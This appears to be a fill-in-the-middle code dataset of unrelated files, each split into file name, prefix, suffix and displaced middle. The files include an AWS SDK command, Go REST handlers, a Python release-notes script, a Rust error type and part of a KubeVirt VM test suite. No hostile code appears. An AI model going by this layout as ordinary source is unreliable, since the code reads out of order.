api-discovery=""
audio="streamer,sdk,audiocontrol"
basic-device-info=""
gpio="environment,actionengined,led,mediaclipcgi,iod,scheduled,ptzadm,"
operator="usera,usero,sdk,wwwo,wwwaovp,wwwaop,wwwao,wwwop,wwwaov,root"
ptz="usera,wwwop,wwwaop,wwwaovp,wwwap,wwwp,wwwovp,root,wwwvp,wwwavp"
users="userv,usero,usera"
viewer="usera,usero,sdk,wwwaovp,wwwaov,wwwov,wwwovp,wwwav,root,userv,wwwv" | """ | digusers="root,operator,viewer" |
DeleteTypedLinkFacetCommand.ts | import { CloudDirectoryClientResolvedConfig, ServiceInputTypes, ServiceOutputTypes } from "../CloudDirectoryClient";
import { DeleteTypedLinkFacetRequest, DeleteTypedLinkFacetResponse } from "../models/models_0";
import {
deserializeAws_restJson1DeleteTypedLinkFacetCommand,
serializeAws_restJson1DeleteTypedLinkFacetCommand,
} from "../protocols/Aws_restJson1";
import { getSerdePlugin } from "@aws-sdk/middleware-serde";
import { HttpRequest as __HttpRequest, HttpResponse as __HttpResponse } from "@aws-sdk/protocol-http";
import { Command as $Command } from "@aws-sdk/smithy-client";
import {
FinalizeHandlerArguments,
Handler,
HandlerExecutionContext,
MiddlewareStack,
HttpHandlerOptions as __HttpHandlerOptions,
MetadataBearer as __MetadataBearer,
SerdeContext as __SerdeContext,
} from "@aws-sdk/types";
export type DeleteTypedLinkFacetCommandInput = DeleteTypedLinkFacetRequest;
export type DeleteTypedLinkFacetCommandOutput = DeleteTypedLinkFacetResponse & __MetadataBearer;
/**
* <p>Deletes a <a>TypedLinkFacet</a>. For more information, see <a href="https://docs.aws.amazon.com/clouddirectory/latest/developerguide/directory_objects_links.html#directory_objects_links_typedlink">Typed Links</a>.</p>
*/
export class DeleteTypedLinkFacetCommand extends $Command<
DeleteTypedLinkFacetCommandInput,
DeleteTypedLinkFacetCommandOutput,
CloudDirectoryClientResolvedConfig
> {
// Start section: command_properties
// End section: command_properties
constructor(readonly input: DeleteTypedLinkFacetCommandInput) {
// Start section: command_constructor
super();
// End section: command_constructor
}
/**
* @internal
*/
resolveMiddleware(
clientStack: MiddlewareStack<ServiceInputTypes, ServiceOutputTypes>,
configuration: CloudDirectoryClientResolvedConfig,
options?: __HttpHandlerOptions
): Handler<DeleteTypedLinkFacetCommandInput, DeleteTypedLinkFacetCommandOutput> {
this.middlewareStack.use(getSerdePlugin(configuration, this.serialize, this.deserialize)); |
const stack = clientStack.concat(this.middlewareStack);
const { logger } = configuration;
const clientName = "CloudDirectoryClient";
const commandName = "DeleteTypedLinkFacetCommand";
const handlerExecutionContext: HandlerExecutionContext = {
logger,
clientName,
commandName,
inputFilterSensitiveLog: DeleteTypedLinkFacetRequest.filterSensitiveLog,
outputFilterSensitiveLog: DeleteTypedLinkFacetResponse.filterSensitiveLog,
};
const { requestHandler } = configuration;
return stack.resolve(
(request: FinalizeHandlerArguments<any>) =>
requestHandler.handle(request.request as __HttpRequest, options || {}),
handlerExecutionContext
);
}
private serialize(input: DeleteTypedLinkFacetCommandInput, context: __SerdeContext): Promise<__HttpRequest> {
return serializeAws_restJson1DeleteTypedLinkFacetCommand(input, context);
}
private deserialize(output: __HttpResponse, context: __SerdeContext): Promise<DeleteTypedLinkFacetCommandOutput> {
return deserializeAws_restJson1DeleteTypedLinkFacetCommand(output, context);
}
// Start section: command_body_extra
// End section: command_body_extra
} | |
main.go | package main
import (
"log"
"net/http"
"github.com/gin-gonic/gin"
"github.com/maxritter/aws-cdk-apprunner-vpc-golang/controllers"
"github.com/maxritter/aws-cdk-apprunner-vpc-golang/db"
"github.com/maxritter/aws-cdk-apprunner-vpc-golang/utils"
)
func main() {
log.Println("Getting secrets..")
rdsSecret := utils.GetSecret()
log.Println("Init DB connection..")
db.Init(rdsSecret)
log.Println("Starting server..")
r := gin.Default()
//HTTP Health Check
r.GET("/", func(c *gin.Context) {
c.String(http.StatusOK, "OK")
})
//REST API
v1 := r.Group("/api/v1")
{
tasks := v1.Group("/tasks")
{
tasks.GET("/", controllers.GetTasks)
tasks.POST("/", controllers.CreateTask) | tasks.DELETE("/:id", controllers.DeleteTask)
}
}
r.Run(":8080") // listen and serve on 0.0.0.0:8080
} | tasks.PUT("/:id", controllers.UpdateTask) |
position_test.go | package pos
import "testing"
var originPosition = Position{X: 0, Y: 0}
func TestNeighbors(t *testing.T) {
neighbors := originPosition.Neighbors()
if len(neighbors) != 8 {
t.Errorf("Position neighbors should contain 8 elems")
}
if positionsInclude(neighbors, originPosition) {
t.Errorf("Neighbors of a position should not include that position itself")
}
}
func | (positions []Position, pos Position) bool {
for _, elem := range positions {
if elem == pos {
return true
}
}
return false
}
| positionsInclude |
academicSessions.go | package handlers
import (
"github.com/fffnite/go-oneroster/ormodel"
"github.com/go-chi/render"
"go.mongodb.org/mongo-driver/bson"
"go.mongodb.org/mongo-driver/mongo"
"net/http"
"time"
)
var asCols = []string{
"sourcedId",
"status",
"dateLastModified",
"title",
"startDate",
"endDate",
"type",
"parent",
"children",
"schoolYear",
}
func GetAllAcademicSessions(client *mongo.Client) http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
c := client.Database("oneroster").Collection("academicSessions")
res, errP := GetCollection(c, asCols, w, r)
out := struct {
Output []bson.M `json:"academicSessions,omitempty"`
ErrorPayload []error `json:"statusInfoSet,omitempty"`
}{res, errP}
render.JSON(w, r, out)
}
}
func GetAcademicSession(client *mongo.Client) http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
c := client.Database("oneroster").Collection("academicSessions")
res, errP := GetDoc(c, asCols, w, r)
out := struct {
Output bson.M `json:"academicSession,omitempty"`
ErrorPayload []error `json:"statusInfoSet,omitempty"`
}{res, errP}
render.JSON(w, r, out)
}
}
func | (client *mongo.Client) http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
c := client.Database("oneroster").Collection("academicSessions")
var data ormodel.AcademicSessions
data.DateLastModified = time.Now()
PutDoc(c, &data, w, r)
}
}
| PutAcademicSession |
create_release_notes.py | def create_release_notes():
import os
path = os.path.dirname(os.path.abspath(__file__))
changelog_filename = os.path.join(path, "../CHANGELOG.md")
release_notes_filename = os.path.join(path, "../RELEASE_NOTES.md")
with open(changelog_filename, "r") as changelog:
with open(release_notes_filename, "w") as release_notes:
started = False
# Search top-most release notes
while not started:
line = changelog.readline()
if not line:
break
if line.startswith("## ["):
started = True
while started:
# reduce title indentation
if line.startswith("##"):
line = line[1:]
release_notes.write(line)
line = changelog.readline()
if not line or line.startswith("## ["):
break
if __name__ == "__main__":
| create_release_notes() |
|
error.rs | pub enum EnvironmentError {
UndefinedIdentifier(String),
}
impl std::fmt::Display for EnvironmentError {
fn | (&self, f: &mut std::fmt::Formatter) -> std::fmt::Result {
match *self {
EnvironmentError::UndefinedIdentifier(ref name) => {
write!(f, "Undefined variable {}", name)
}
}
}
}
| fmt |
vm_test.go | /*
* This file is part of the KubeVirt project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*
* Copyright 2018 Red Hat, Inc.
*
*/
package tests_test
import (
"fmt"
"io/ioutil"
"net/http"
"os"
"regexp"
"strings"
"time"
expect "github.com/google/goexpect"
. "github.com/onsi/ginkgo"
"github.com/onsi/ginkgo/extensions/table"
. "github.com/onsi/gomega"
"github.com/pborman/uuid"
k8sv1 "k8s.io/api/core/v1"
v13 "k8s.io/api/core/v1"
"k8s.io/apimachinery/pkg/api/errors"
"k8s.io/apimachinery/pkg/api/resource"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
v12 "k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/apimachinery/pkg/types"
"k8s.io/apimachinery/pkg/util/json"
v1 "kubevirt.io/client-go/api/v1"
"kubevirt.io/client-go/kubecli"
cdiv1 "kubevirt.io/containerized-data-importer/pkg/apis/core/v1alpha1"
"kubevirt.io/kubevirt/pkg/controller"
"kubevirt.io/kubevirt/pkg/virtctl/vm"
"kubevirt.io/kubevirt/tests"
)
var _ = Describe("[rfe_id:1177][crit:medium][vendor:[email protected]][level:component]VirtualMachine", func() {
tests.FlagParse()
virtClient, err := kubecli.GetKubevirtClient()
tests.PanicOnError(err)
runStrategyAlways := v1.RunStrategyAlways
runStrategyHalted := v1.RunStrategyHalted
BeforeEach(func() {
tests.BeforeTestCleanup()
})
Context("An invalid VirtualMachine given", func() {
It("[test_id:1518]should be rejected on POST", func() {
vmiImage := tests.ContainerDiskFor(tests.ContainerDiskCirros)
template := tests.NewRandomVMIWithEphemeralDiskAndUserdata(vmiImage, "echo Hi\n")
newVM := tests.NewRandomVirtualMachine(template, false)
jsonBytes, err := json.Marshal(newVM)
Expect(err).To(BeNil())
// change the name of a required field (like domain) so validation will fail
jsonString := strings.Replace(string(jsonBytes), "domain", "not-a-domain", -1)
result := virtClient.RestClient().Post().Resource("virtualmachines").Namespace(tests.NamespaceTestDefault).Body([]byte(jsonString)).SetHeader("Content-Type", "application/json").Do()
// Verify validation failed.
statusCode := 0
result.StatusCode(&statusCode)
Expect(statusCode).To(Equal(http.StatusUnprocessableEntity))
})
It("[test_id:1519]should reject POST if validation webhoook deems the spec is invalid", func() {
vmiImage := tests.ContainerDiskFor(tests.ContainerDiskCirros)
template := tests.NewRandomVMIWithEphemeralDiskAndUserdata(vmiImage, "echo Hi\n")
// Add a disk that doesn't map to a volume.
// This should get rejected which tells us the webhook validator is working.
template.Spec.Domain.Devices.Disks = append(template.Spec.Domain.Devices.Disks, v1.Disk{
Name: "testdisk",
})
newVM := tests.NewRandomVirtualMachine(template, false)
result := virtClient.RestClient().Post().Resource("virtualmachines").Namespace(tests.NamespaceTestDefault).Body(newVM).Do()
// Verify validation failed.
statusCode := 0
result.StatusCode(&statusCode)
Expect(statusCode).To(Equal(http.StatusUnprocessableEntity))
reviewResponse := &v12.Status{}
body, _ := result.Raw()
err = json.Unmarshal(body, reviewResponse)
Expect(err).To(BeNil())
Expect(len(reviewResponse.Details.Causes)).To(Equal(1))
Expect(reviewResponse.Details.Causes[0].Field).To(Equal("spec.template.spec.domain.devices.disks[2].name"))
})
It("should be rejected when VM template lists a DataVolume, but VM lists PVC VolumeSource", func() {
dv := tests.NewRandomDataVolumeWithHttpImport(tests.GetUrl(tests.AlpineHttpUrl), tests.NamespaceTestDefault, k8sv1.ReadWriteOnce)
_, err := virtClient.CdiClient().CdiV1alpha1().DataVolumes(dv.Namespace).Create(dv)
Expect(err).To(BeNil())
defer func(dv *cdiv1.DataVolume) {
By("Deleting the DataVolume")
ExpectWithOffset(1, virtClient.CdiClient().CdiV1alpha1().DataVolumes(dv.Namespace).Delete(dv.Name, &metav1.DeleteOptions{})).To(Succeed())
}(dv)
tests.WaitForSuccessfulDataVolumeImport(dv, 60)
vmi := tests.NewRandomVMI()
vmi.Spec.Domain.Resources.Requests[k8sv1.ResourceMemory] = resource.MustParse("64M")
diskName := "disk0"
bus := "virtio"
vmi.Spec.Domain.Devices.Disks = append(vmi.Spec.Domain.Devices.Disks, v1.Disk{
Name: diskName,
DiskDevice: v1.DiskDevice{
Disk: &v1.DiskTarget{
Bus: bus,
},
},
})
vmi.Spec.Volumes = append(vmi.Spec.Volumes, v1.Volume{
Name: diskName,
VolumeSource: v1.VolumeSource{
PersistentVolumeClaim: &k8sv1.PersistentVolumeClaimVolumeSource{
ClaimName: dv.ObjectMeta.Name,
},
},
})
vmi.Spec.Domain.Resources.Requests[k8sv1.ResourceMemory] = resource.MustParse("512M")
vm := tests.NewRandomVirtualMachine(vmi, true)
vm.Spec.DataVolumeTemplates = append(vm.Spec.DataVolumeTemplates, *dv)
_, err = virtClient.VirtualMachine(tests.NamespaceTestDefault).Create(vm)
Expect(err).Should(HaveOccurred())
})
It("should fail to start when a volume is backed by PVC created by DataVolume instead of the DataVolume itself", func() {
dv := tests.NewRandomDataVolumeWithHttpImport(tests.GetUrl(tests.AlpineHttpUrl), tests.NamespaceTestDefault, k8sv1.ReadWriteOnce)
_, err := virtClient.CdiClient().CdiV1alpha1().DataVolumes(dv.Namespace).Create(dv)
Expect(err).To(BeNil())
defer func(dv *cdiv1.DataVolume) {
By("Deleting the DataVolume")
ExpectWithOffset(1, virtClient.CdiClient().CdiV1alpha1().DataVolumes(dv.Namespace).Delete(dv.Name, &metav1.DeleteOptions{})).To(Succeed())
}(dv)
tests.WaitForSuccessfulDataVolumeImport(dv, 60)
vmi := tests.NewRandomVMI()
vmi.Spec.Domain.Resources.Requests[k8sv1.ResourceMemory] = resource.MustParse("64M")
diskName := "disk0"
bus := "virtio"
vmi.Spec.Domain.Devices.Disks = append(vmi.Spec.Domain.Devices.Disks, v1.Disk{
Name: diskName,
DiskDevice: v1.DiskDevice{
Disk: &v1.DiskTarget{
Bus: bus,
},
},
})
vmi.Spec.Volumes = append(vmi.Spec.Volumes, v1.Volume{
Name: diskName,
VolumeSource: v1.VolumeSource{
PersistentVolumeClaim: &k8sv1.PersistentVolumeClaimVolumeSource{
ClaimName: dv.ObjectMeta.Name,
},
},
})
vmi.Spec.Domain.Resources.Requests[k8sv1.ResourceMemory] = resource.MustParse("512M")
vm := tests.NewRandomVirtualMachine(vmi, true)
_, err = virtClient.VirtualMachine(tests.NamespaceTestDefault).Create(vm)
Expect(err).ShouldNot(HaveOccurred())
Eventually(func() bool {
vm, err := virtClient.VirtualMachine(vm.Namespace).Get(vm.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
return vm.Status.Created
}, 30*time.Second, 1*time.Second).Should(Equal(false))
})
})
Context("A mutated VirtualMachine given", func() {
var testingMachineType string = "pc-q35-2.7"
BeforeEach(func() {
_, err := virtClient.CoreV1().ConfigMaps(tests.KubeVirtInstallNamespace).Get("kubevirt-config", metav1.GetOptions{})
if err != nil && !errors.IsNotFound(err) {
Expect(err).ToNot(HaveOccurred())
}
if errors.IsNotFound(err) {
// create an empty kubevirt-config configmap if none exists.
cfgMap := &k8sv1.ConfigMap{
ObjectMeta: metav1.ObjectMeta{Name: "kubevirt-config"},
Data: map[string]string{
"machine-type": testingMachineType,
},
}
_, err = virtClient.CoreV1().ConfigMaps(tests.KubeVirtInstallNamespace).Create(cfgMap)
Expect(err).ToNot(HaveOccurred())
} else if err == nil {
tests.UpdateClusterConfigValueAndWait("machine-type", testingMachineType)
}
})
newVirtualMachineInstanceWithContainerDisk := func() (*v1.VirtualMachineInstance, *cdiv1.DataVolume) {
vmiImage := tests.ContainerDiskFor(tests.ContainerDiskCirros)
return tests.NewRandomVMIWithEphemeralDiskAndUserdata(vmiImage, "echo Hi\n"), nil
}
createVirtualMachine := func(running bool, template *v1.VirtualMachineInstance) *v1.VirtualMachine {
By("Creating VirtualMachine")
vm := tests.NewRandomVirtualMachine(template, running)
newVM, err := virtClient.VirtualMachine(tests.NamespaceTestDefault).Create(vm)
Expect(err).ToNot(HaveOccurred())
return newVM
}
It("[test_id:3312]should set the default MachineType when created without explicit value", func() {
By("Creating VirtualMachine")
template, _ := newVirtualMachineInstanceWithContainerDisk()
template.Spec.Domain.Machine.Type = ""
vm := createVirtualMachine(false, template)
createdVM, err := virtClient.VirtualMachine(vm.Namespace).Get(vm.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
Expect(createdVM.Spec.Template.Spec.Domain.Machine.Type).To(Equal(testingMachineType))
})
It("[test_id:3311]should keep the supplied MachineType when created", func() {
By("Creating VirtualMachine")
explicitMachineType := "pc-q35-3.0"
template, _ := newVirtualMachineInstanceWithContainerDisk()
template.Spec.Domain.Machine.Type = explicitMachineType
vm := createVirtualMachine(false, template)
createdVM, err := virtClient.VirtualMachine(vm.Namespace).Get(vm.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
Expect(createdVM.Spec.Template.Spec.Domain.Machine.Type).To(Equal(explicitMachineType))
})
})
Context("A valid VirtualMachine given", func() {
type vmiBuilder func() (*v1.VirtualMachineInstance, *cdiv1.DataVolume)
newVirtualMachineInstanceWithContainerDisk := func() (*v1.VirtualMachineInstance, *cdiv1.DataVolume) {
vmiImage := tests.ContainerDiskFor(tests.ContainerDiskCirros)
return tests.NewRandomVMIWithEphemeralDiskAndUserdata(vmiImage, "echo Hi\n"), nil
}
newVirtualMachineInstanceWithOCSFileDisk := func() (*v1.VirtualMachineInstance, *cdiv1.DataVolume) {
return tests.NewRandomVirtualMachineInstanceWithOCSDisk(tests.GetUrl(tests.AlpineHttpUrl), tests.NamespaceTestDefault, v13.ReadWriteOnce, v13.PersistentVolumeFilesystem)
}
newVirtualMachineInstanceWithOCSBlockDisk := func() (*v1.VirtualMachineInstance, *cdiv1.DataVolume) {
return tests.NewRandomVirtualMachineInstanceWithOCSDisk(tests.GetUrl(tests.AlpineHttpUrl), tests.NamespaceTestDefault, v13.ReadWriteOnce, v13.PersistentVolumeBlock)
}
deleteDataVolume := func(dv *cdiv1.DataVolume) {
if dv != nil {
By("Deleting the DataVolume")
ExpectWithOffset(1, virtClient.CdiClient().CdiV1alpha1().DataVolumes(dv.Namespace).Delete(dv.Name, &metav1.DeleteOptions{})).To(Succeed())
}
}
createVirtualMachine := func(running bool, template *v1.VirtualMachineInstance) *v1.VirtualMachine {
By("Creating VirtualMachine")
vm := tests.NewRandomVirtualMachine(template, running)
newVM, err := virtClient.VirtualMachine(tests.NamespaceTestDefault).Create(vm)
Expect(err).ToNot(HaveOccurred())
return newVM
}
newVirtualMachine := func(running bool) *v1.VirtualMachine {
template, _ := newVirtualMachineInstanceWithContainerDisk()
return createVirtualMachine(running, template)
}
newVirtualMachineWithRunStrategy := func(runStrategy v1.VirtualMachineRunStrategy) *v1.VirtualMachine {
vmiImage := tests.ContainerDiskFor(tests.ContainerDiskCirros)
template := tests.NewRandomVMIWithEphemeralDiskAndUserdata(vmiImage, "echo Hi\n")
var newVM *v1.VirtualMachine
var err error
newVM = NewRandomVirtualMachineWithRunStrategy(template, runStrategy)
newVM, err = virtClient.VirtualMachine(tests.NamespaceTestDefault).Create(newVM)
Expect(err).ToNot(HaveOccurred())
return newVM
}
startVM := func(vm *v1.VirtualMachine) *v1.VirtualMachine {
By("Starting the VirtualMachine")
Eventually(func() error {
updatedVM, err := virtClient.VirtualMachine(vm.Namespace).Get(vm.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
updatedVM.Spec.Running = nil
updatedVM.Spec.RunStrategy = &runStrategyAlways
_, err = virtClient.VirtualMachine(updatedVM.Namespace).Update(updatedVM)
return err
}, 300*time.Second, 1*time.Second).ShouldNot(HaveOccurred())
updatedVM, err := virtClient.VirtualMachine(vm.Namespace).Get(vm.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
// Observe the VirtualMachineInstance created
Eventually(func() error {
_, err := virtClient.VirtualMachineInstance(updatedVM.Namespace).Get(updatedVM.Name, &v12.GetOptions{})
return err
}, 300*time.Second, 1*time.Second).Should(Succeed())
By("VMI has the running condition")
Eventually(func() bool {
vm, err := virtClient.VirtualMachine(updatedVM.Namespace).Get(updatedVM.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
return vm.Status.Ready
}, 300*time.Second, 1*time.Second).Should(BeTrue())
return updatedVM
}
stopVM := func(vm *v1.VirtualMachine) *v1.VirtualMachine {
By("Stopping the VirtualMachine")
err = tests.RetryWithMetadataIfModified(vm.ObjectMeta, func(meta v12.ObjectMeta) error {
updatedVM, err := virtClient.VirtualMachine(meta.Namespace).Get(meta.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
updatedVM.Spec.Running = nil
updatedVM.Spec.RunStrategy = &runStrategyHalted
_, err = virtClient.VirtualMachine(meta.Namespace).Update(updatedVM)
return err
})
Expect(err).ToNot(HaveOccurred())
updatedVM, err := virtClient.VirtualMachine(vm.Namespace).Get(vm.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
// Observe the VirtualMachineInstance deleted
Eventually(func() bool {
_, err = virtClient.VirtualMachineInstance(updatedVM.Namespace).Get(updatedVM.Name, &v12.GetOptions{})
if errors.IsNotFound(err) {
return true
}
return false
}, 300*time.Second, 1*time.Second).Should(BeTrue(), "The vmi did not disappear")
By("VMI has not the running condition")
Eventually(func() bool {
vm, err := virtClient.VirtualMachine(updatedVM.Namespace).Get(updatedVM.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
return vm.Status.Ready
}, 300*time.Second, 1*time.Second).Should(BeFalse())
return updatedVM
}
startVMIDontWait := func(vm *v1.VirtualMachine) *v1.VirtualMachine {
By("Starting the VirtualMachineInstance")
err := tests.RetryWithMetadataIfModified(vm.ObjectMeta, func(meta v12.ObjectMeta) error {
updatedVM, err := virtClient.VirtualMachine(meta.Namespace).Get(meta.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
updatedVM.Spec.Running = nil
updatedVM.Spec.RunStrategy = &runStrategyAlways
_, err = virtClient.VirtualMachine(meta.Namespace).Update(updatedVM)
return err
})
Expect(err).ToNot(HaveOccurred())
updatedVM, err := virtClient.VirtualMachine(vm.Namespace).Get(vm.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
return updatedVM
}
It("[test_id:3161]should carry annotations to VMI", func() {
annotations := map[string]string{
"testannotation": "test",
}
vm := newVirtualMachine(false)
err = tests.RetryWithMetadataIfModified(vm.ObjectMeta, func(meta v12.ObjectMeta) error {
vm, err = virtClient.VirtualMachine(meta.Namespace).Get(meta.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
vm.Spec.Template.ObjectMeta.Annotations = annotations
vm, err = virtClient.VirtualMachine(meta.Namespace).Update(vm)
return err
})
Expect(err).ToNot(HaveOccurred())
startVMIDontWait(vm)
By("checking for annotations to be present")
Eventually(func() map[string]string {
vmi, err := virtClient.VirtualMachineInstance(vm.Namespace).Get(vm.Name, &v12.GetOptions{})
if err != nil {
return map[string]string{}
}
return vmi.Annotations
}, 300*time.Second, 1*time.Second).Should(HaveKeyWithValue("testannotation", "test"), "VM should start normaly.")
})
It("[test_id:3162]should ignore kubernetes and kubevirt annotations to VMI", func() {
annotations := map[string]string{
"kubevirt.io/test": "test",
"kubernetes.io/test": "test",
}
vm := newVirtualMachine(false)
err = tests.RetryWithMetadataIfModified(vm.ObjectMeta, func(meta v12.ObjectMeta) error {
vm, err = virtClient.VirtualMachine(meta.Namespace).Get(meta.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
vm.Annotations = annotations
vm, err = virtClient.VirtualMachine(meta.Namespace).Update(vm)
return err
})
Expect(err).ToNot(HaveOccurred())
startVMIDontWait(vm)
By("checking for annotations to not be present")
vmi := &v1.VirtualMachineInstance{}
Eventually(func() error {
vmi, err = virtClient.VirtualMachineInstance(vm.Namespace).Get(vm.Name, &v12.GetOptions{})
return err
}, 300*time.Second, 1*time.Second).ShouldNot(HaveOccurred(), "VMI should be created normaly.")
Expect(vmi.Annotations).ShouldNot(HaveKey("kubevirt.io/test"), "kubevirt internal annotations should be ignored")
Expect(vmi.Annotations).ShouldNot(HaveKey("kubernetes.io/test"), "kubernetes internal annotations should be ignored")
})
table.DescribeTable("[test_id:1520]should update VirtualMachine once VMIs are up", func(createTemplate vmiBuilder) {
template, dv := createTemplate()
defer deleteDataVolume(dv)
newVM := createVirtualMachine(true, template)
Eventually(func() bool {
vm, err := virtClient.VirtualMachine(tests.NamespaceTestDefault).Get(newVM.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
return vm.Status.Ready
}, 300*time.Second, 1*time.Second).Should(BeTrue())
},
table.Entry("with ContainerDisk", newVirtualMachineInstanceWithContainerDisk),
table.Entry("with OCS Filesystem Disk", newVirtualMachineInstanceWithOCSFileDisk),
table.Entry("with OCS Block Disk", newVirtualMachineInstanceWithOCSBlockDisk),
)
table.DescribeTable("[test_id:1521]should remove VirtualMachineInstance once the VM is marked for deletion", func(createTemplate vmiBuilder) {
template, dv := createTemplate()
defer deleteDataVolume(dv)
newVM := createVirtualMachine(true, template)
// Delete it
Expect(virtClient.VirtualMachine(newVM.Namespace).Delete(newVM.Name, &v12.DeleteOptions{})).To(Succeed())
// Wait until VMI is gone
Eventually(func() int {
vmis, err := virtClient.VirtualMachineInstance(newVM.Namespace).List(&v12.ListOptions{})
Expect(err).ToNot(HaveOccurred())
return len(vmis.Items)
}, 300*time.Second, 2*time.Second).Should(BeZero(), "The VirtualMachineInstance did not disappear")
},
table.Entry("with ContainerDisk", newVirtualMachineInstanceWithContainerDisk),
table.Entry("with OCS Filesystem Disk", newVirtualMachineInstanceWithOCSFileDisk),
table.Entry("with OCS Block Disk", newVirtualMachineInstanceWithOCSBlockDisk),
)
It("[test_id:1522]should remove owner references on the VirtualMachineInstance if it is orphan deleted", func() {
// Cascade=false delete fails in ocp 3.11 with CRDs that contain multiple versions.
tests.SkipIfOpenShiftAndBelowOrEqualVersion("cascade=false delete does not work with CRD multi version support in ocp 3.11", "1.11.0")
newVM := newVirtualMachine(true)
By("Getting owner references")
Eventually(func() []v12.OwnerReference {
// Check for owner reference
vmi, _ := virtClient.VirtualMachineInstance(newVM.Namespace).Get(newVM.Name, &v12.GetOptions{})
return vmi.OwnerReferences
}, 300*time.Second, 1*time.Second).ShouldNot(BeEmpty())
// Delete it
orphanPolicy := v12.DeletePropagationOrphan
By("Deleting VM")
Expect(virtClient.VirtualMachine(newVM.Namespace).
Delete(newVM.Name, &v12.DeleteOptions{PropagationPolicy: &orphanPolicy})).To(Succeed())
// Wait until the virtual machine is deleted
By("Waiting for VM to delete")
Eventually(func() bool {
_, err := virtClient.VirtualMachine(newVM.Namespace).Get(newVM.Name, &v12.GetOptions{})
if errors.IsNotFound(err) {
return true
}
return false
}, 300*time.Second, 1*time.Second).Should(BeTrue())
By("Verifying orphaned VMI still exists")
vmi, err := virtClient.VirtualMachineInstance(newVM.Namespace).Get(newVM.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
Expect(vmi.OwnerReferences).To(BeEmpty())
Expect(err).ToNot(HaveOccurred())
})
It("[test_id:1523]should recreate VirtualMachineInstance if it gets deleted", func() {
newVM := startVM(newVirtualMachine(false))
currentVMI, err := virtClient.VirtualMachineInstance(newVM.Namespace).Get(newVM.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
Expect(virtClient.VirtualMachineInstance(newVM.Namespace).Delete(newVM.Name, &v12.DeleteOptions{})).To(Succeed())
Eventually(func() bool {
vmi, err := virtClient.VirtualMachineInstance(newVM.Namespace).Get(newVM.Name, &v12.GetOptions{})
if errors.IsNotFound(err) {
return false
}
if vmi.UID != currentVMI.UID {
return true
}
return false
}, 240*time.Second, 1*time.Second).Should(BeTrue())
})
It("[test_id:1524]should recreate VirtualMachineInstance if the VirtualMachineInstance's pod gets deleted", func() {
var firstVMI *v1.VirtualMachineInstance
var curVMI *v1.VirtualMachineInstance
var err error
By("Start a new VM")
newVM := newVirtualMachine(true)
// wait for a running VirtualMachineInstance.
By("Waiting for the VM's VirtualMachineInstance to start")
Eventually(func() error {
firstVMI, err = virtClient.VirtualMachineInstance(newVM.Namespace).Get(newVM.Name, &v12.GetOptions{})
if err != nil {
return err
}
if !firstVMI.IsRunning() {
return fmt.Errorf("vmi still isn't running")
}
return nil
}, 120*time.Second, 1*time.Second).Should(Succeed())
// get the pod backing the VirtualMachineInstance
By("Getting the pod backing the VirtualMachineInstance")
pods, err := virtClient.CoreV1().Pods(newVM.Namespace).List(tests.UnfinishedVMIPodSelector(firstVMI))
Expect(err).ToNot(HaveOccurred())
Expect(len(pods.Items)).To(Equal(1))
firstPod := pods.Items[0]
// Delete the Pod
By("Deleting the VirtualMachineInstance's pod")
Eventually(func() error {
return virtClient.CoreV1().Pods(newVM.Namespace).Delete(firstPod.Name, &v12.DeleteOptions{})
}, 120*time.Second, 1*time.Second).Should(Succeed())
// Wait on the VMI controller to create a new VirtualMachineInstance
By("Waiting for a new VirtualMachineInstance to spawn")
Eventually(func() bool {
curVMI, err = virtClient.VirtualMachineInstance(newVM.Namespace).Get(newVM.Name, &v12.GetOptions{})
// verify a new VirtualMachineInstance gets created for the VM after the Pod is deleted.
if errors.IsNotFound(err) {
return false
} else if string(curVMI.UID) == string(firstVMI.UID) {
return false
} else if !curVMI.IsRunning() {
return false
}
return true
}, 120*time.Second, 1*time.Second).Should(BeTrue())
// sanity check that the test ran correctly by
// verifying a different Pod backs the VMI as well.
By("Verifying a new pod backs the VMI")
pods, err = virtClient.CoreV1().Pods(newVM.Namespace).List(tests.UnfinishedVMIPodSelector(curVMI))
Expect(err).ToNot(HaveOccurred())
Expect(len(pods.Items)).To(Equal(1))
pod := pods.Items[0]
Expect(pod.Name).ToNot(Equal(firstPod.Name))
})
table.DescribeTable("[test_id:1525]should stop VirtualMachineInstance if running set to false", func(createTemplate vmiBuilder) {
template, dv := createTemplate()
defer deleteDataVolume(dv)
vm := createVirtualMachine(false, template)
vm = startVM(vm)
vm = stopVM(vm)
},
table.Entry("with ContainerDisk", newVirtualMachineInstanceWithContainerDisk),
table.Entry("with OCS Filesystem Disk", newVirtualMachineInstanceWithOCSFileDisk),
table.Entry("with OCS Block Disk", newVirtualMachineInstanceWithOCSBlockDisk),
)
It("[test_id:1526]should start and stop VirtualMachineInstance multiple times", func() {
vm := newVirtualMachine(false)
// Start and stop VirtualMachineInstance multiple times
for i := 0; i < 5; i++ {
By(fmt.Sprintf("Doing run: %d", i))
startVM(vm)
stopVM(vm)
}
})
